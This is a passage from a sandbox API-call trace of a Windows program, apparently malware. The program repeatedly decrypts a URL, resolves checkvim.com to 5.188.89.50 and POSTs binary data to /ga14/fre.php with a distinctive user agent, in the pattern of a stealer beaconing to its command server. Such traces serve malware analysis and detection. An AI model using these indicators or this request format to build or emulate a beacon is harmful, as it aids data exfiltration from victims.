Size=0x1fdc) returned 0x8825d8 [0253.807] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0253.808] wvsprintfA (in: param_1=0x8825d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0253.808] GetProcessHeap () returned 0x840000 [0253.809] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0253.809] GetProcessHeap () returned 0x840000 [0253.809] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0253.809] send (s=0x394, buf=0x873a58*, len=237, flags=0) returned 237 [0253.809] send (s=0x394, buf=0x87eb58*, len=159, flags=0) returned 159 [0253.809] GetProcessHeap () returned 0x840000 [0253.809] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0253.809] recv (in: s=0x394, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0254.183] GetProcessHeap () returned 0x840000 [0254.183] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0254.183] GetProcessHeap () returned 0x840000 [0254.183] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fa70 | out: hHeap=0x840000) returned 1 [0254.183] GetProcessHeap () returned 0x840000 [0254.183] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0254.183] GetProcessHeap () returned 0x840000 [0254.183] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86fce8 | out: hHeap=0x840000) returned 1 [0254.183] closesocket (s=0x394) returned 0 [0254.183] GetProcessHeap () returned 0x840000 [0254.183] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b08 | out: hHeap=0x840000) returned 1 [0254.183] GetProcessHeap () returned 0x840000 [0254.184] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0254.184] GetProcessHeap () returned 0x840000 [0254.184] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb48 | out: hHeap=0x840000) returned 1 [0254.184] GetProcessHeap () returned 0x840000 [0254.184] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x840000) returned 1 [0254.184] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x108c) returned 0x394 [0254.191] Sleep (dwMilliseconds=0xea60) [0254.260] GetProcessHeap () returned 0x840000 [0254.260] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fdd0 [0254.261] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0254.262] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0254.269] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0254.274] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0254.284] GetProcessHeap () returned 0x840000 [0254.284] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0254.285] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0254.285] CryptImportKey (in: hProv=0x86f688, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e5f0) returned 1 [0254.286] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0254.286] CryptSetKeyParam (hKey=0x87e5f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0254.287] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0254.287] CryptSetKeyParam (hKey=0x87e5f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0254.287] GetProcessHeap () returned 0x840000 [0254.287] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0254.289] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0254.289] CryptDecrypt (in: hKey=0x87e5f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fdd0, pdwDataLen=0x19f9a4 | out: pbData=0x87fdd0, pdwDataLen=0x19f9a4) returned 1 [0254.290] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0254.291] CryptDestroyKey (hKey=0x87e5f0) returned 1 [0254.291] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0254.292] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0254.292] GetProcessHeap () returned 0x840000 [0254.292] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0254.292] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0254.293] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0254.294] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0254.294] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0254.295] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0254.295] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0254.296] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0254.297] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0254.297] GetProcessHeap () returned 0x840000 [0254.297] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871330 [0254.297] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0254.297] GetProcessHeap () returned 0x840000 [0254.297] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871330 | out: hHeap=0x840000) returned 1 [0254.297] GetProcessHeap () returned 0x840000 [0254.297] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0254.297] GetProcessHeap () returned 0x840000 [0254.297] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fdd0 | out: hHeap=0x840000) returned 1 [0254.297] GetProcessHeap () returned 0x840000 [0254.297] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fc20 [0254.298] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0254.299] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0254.305] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0254.306] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fe80) returned 1 [0254.314] GetProcessHeap () returned 0x840000 [0254.314] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708d8 [0254.315] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0254.315] CryptImportKey (in: hProv=0x86fe80, pbData=0x8708d8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e930) returned 1 [0254.316] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0254.317] CryptSetKeyParam (hKey=0x87e930, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0254.318] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0254.319] CryptSetKeyParam (hKey=0x87e930, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0254.319] GetProcessHeap () returned 0x840000 [0254.319] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708d8 | out: hHeap=0x840000) returned 1 [0254.319] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0254.320] CryptDecrypt (in: hKey=0x87e930, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fc20, pdwDataLen=0x19f9a4 | out: pbData=0x87fc20, pdwDataLen=0x19f9a4) returned 1 [0254.321] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0254.321] CryptDestroyKey (hKey=0x87e930) returned 1 [0254.322] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0254.322] CryptReleaseContext (hProv=0x86fe80, dwFlags=0x0) returned 1 [0254.322] GetProcessHeap () returned 0x840000 [0254.322] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0254.323] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0254.324] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0254.324] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0254.325] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0254.326] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0254.326] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0254.326] GetProcessHeap () returned 0x840000 [0254.326] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8713a8 [0254.326] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871600*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789e0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0254.328] GetProcessHeap () returned 0x840000 [0254.328] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b18 [0254.328] socket (af=2, type=1, protocol=6) returned 0x398 [0254.329] connect (s=0x398, name=0x8789e0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0254.399] FreeAddrInfoW (pAddrInfo=0x871600*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789e0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0254.399] GetProcessHeap () returned 0x840000 [0254.399] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f688 [0254.399] GetProcessHeap () returned 0x840000 [0254.399] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8825d8 [0254.400] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0254.401] wvsprintfA (in: param_1=0x8825d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0254.401] GetProcessHeap () returned 0x840000 [0254.401] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0254.401] GetProcessHeap () returned 0x840000 [0254.401] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0254.401] GetProcessHeap () returned 0x840000 [0254.401] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fb90 [0254.401] GetProcessHeap () returned 0x840000 [0254.401] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8825d8 [0254.402] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0254.403] wvsprintfA (in: param_1=0x8825d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0254.403] GetProcessHeap () returned 0x840000 [0254.403] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0254.403] GetProcessHeap () returned 0x840000 [0254.403] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0254.403] send (s=0x398, buf=0x873a58*, len=237, flags=0) returned 237 [0254.404] send (s=0x398, buf=0x87eb58*, len=159, flags=0) returned 159 [0254.404] GetProcessHeap () returned 0x840000 [0254.404] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0254.404] recv (in: s=0x398, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0254.786] GetProcessHeap () returned 0x840000 [0254.786] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0254.786] GetProcessHeap () returned 0x840000 [0254.786] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb90 | out: hHeap=0x840000) returned 1 [0254.786] GetProcessHeap () returned 0x840000 [0254.786] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0254.786] GetProcessHeap () returned 0x840000 [0254.786] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f688 | out: hHeap=0x840000) returned 1 [0254.786] closesocket (s=0x398) returned 0 [0254.787] GetProcessHeap () returned 0x840000 [0254.787] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b18 | out: hHeap=0x840000) returned 1 [0254.787] GetProcessHeap () returned 0x840000 [0254.787] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0254.787] GetProcessHeap () returned 0x840000 [0254.787] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fc20 | out: hHeap=0x840000) returned 1 [0254.787] GetProcessHeap () returned 0x840000 [0254.787] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8713a8 | out: hHeap=0x840000) returned 1 [0254.787] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x1098) returned 0x398 [0254.789] Sleep (dwMilliseconds=0xea60) [0254.791] GetProcessHeap () returned 0x840000 [0254.791] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f5f0 [0254.792] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0254.792] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0254.812] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0254.812] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fac8) returned 1 [0254.820] GetProcessHeap () returned 0x840000 [0254.820] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708d8 [0254.821] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0254.822] CryptImportKey (in: hProv=0x86fac8, pbData=0x8708d8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e9b0) returned 1 [0254.822] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0254.823] CryptSetKeyParam (hKey=0x87e9b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0254.824] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0254.824] CryptSetKeyParam (hKey=0x87e9b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0254.824] GetProcessHeap () returned 0x840000 [0254.824] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708d8 | out: hHeap=0x840000) returned 1 [0254.825] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0254.826] CryptDecrypt (in: hKey=0x87e9b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f5f0, pdwDataLen=0x19f9a4 | out: pbData=0x87f5f0, pdwDataLen=0x19f9a4) returned 1 [0254.827] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0254.827] CryptDestroyKey (hKey=0x87e9b0) returned 1 [0254.828] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0254.828] CryptReleaseContext (hProv=0x86fac8, dwFlags=0x0) returned 1 [0254.828] GetProcessHeap () returned 0x840000 [0254.828] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x873300 [0254.829] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0254.829] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0254.830] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0254.831] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0254.832] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0254.832] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0254.836] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0254.837] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0254.837] GetProcessHeap () returned 0x840000 [0254.837] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871218 [0254.837] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0254.837] GetProcessHeap () returned 0x840000 [0254.837] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871218 | out: hHeap=0x840000) returned 1 [0254.837] GetProcessHeap () returned 0x840000 [0254.837] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873300 | out: hHeap=0x840000) returned 1 [0254.837] GetProcessHeap () returned 0x840000 [0254.837] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f5f0 | out: hHeap=0x840000) returned 1 [0254.837] GetProcessHeap () returned 0x840000 [0254.837] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fb00 [0254.838] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0254.839] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0254.845] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0254.846] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fce8) returned 1 [0254.853] GetProcessHeap () returned 0x840000 [0254.853] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0254.854] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0254.855] CryptImportKey (in: hProv=0x86fce8, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e3b0) returned 1 [0254.856] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0254.857] CryptSetKeyParam (hKey=0x87e3b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0254.858] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0254.858] CryptSetKeyParam (hKey=0x87e3b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0254.858] GetProcessHeap () returned 0x840000 [0254.858] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0254.859] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0254.860] CryptDecrypt (in: hKey=0x87e3b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fb00, pdwDataLen=0x19f9a4 | out: pbData=0x87fb00, pdwDataLen=0x19f9a4) returned 1 [0254.861] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0254.861] CryptDestroyKey (hKey=0x87e3b0) returned 1 [0254.862] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0254.863] CryptReleaseContext (hProv=0x86fce8, dwFlags=0x0) returned 1 [0254.863] GetProcessHeap () returned 0x840000 [0254.863] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0254.864] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0254.865] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0254.866] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0254.866] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0254.867] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0254.867] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0254.867] GetProcessHeap () returned 0x840000 [0254.867] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871178 [0254.868] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x8712e0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b90*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0254.869] GetProcessHeap () returned 0x840000 [0254.869] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871ca8 [0254.870] socket (af=2, type=1, protocol=6) returned 0x39c [0254.870] connect (s=0x39c, name=0x878b90*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0254.936] FreeAddrInfoW (pAddrInfo=0x8712e0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b90*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0254.936] GetProcessHeap () returned 0x840000 [0254.936] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f930 [0254.936] GetProcessHeap () returned 0x840000 [0254.936] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8825d8 [0254.937] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0254.938] wvsprintfA (in: param_1=0x8825d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0254.938] GetProcessHeap () returned 0x840000 [0254.938] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0254.938] GetProcessHeap () returned 0x840000 [0254.938] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0254.938] GetProcessHeap () returned 0x840000 [0254.938] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f5f0 [0254.938] GetProcessHeap () returned 0x840000 [0254.938] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8825d8 [0254.939] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0254.940] wvsprintfA (in: param_1=0x8825d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0254.940] GetProcessHeap () returned 0x840000 [0254.940] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0254.940] GetProcessHeap () returned 0x840000 [0254.940] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0254.940] send (s=0x39c, buf=0x873a58*, len=237, flags=0) returned 237 [0254.941] send (s=0x39c, buf=0x87eb58*, len=159, flags=0) returned 159 [0254.941] GetProcessHeap () returned 0x840000 [0254.941] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0254.941] recv (in: s=0x39c, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0255.298] GetProcessHeap () returned 0x840000 [0255.298] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0255.298] GetProcessHeap () returned 0x840000 [0255.298] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f5f0 | out: hHeap=0x840000) returned 1 [0255.298] GetProcessHeap () returned 0x840000 [0255.298] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0255.299] GetProcessHeap () returned 0x840000 [0255.299] HeapFree (in: 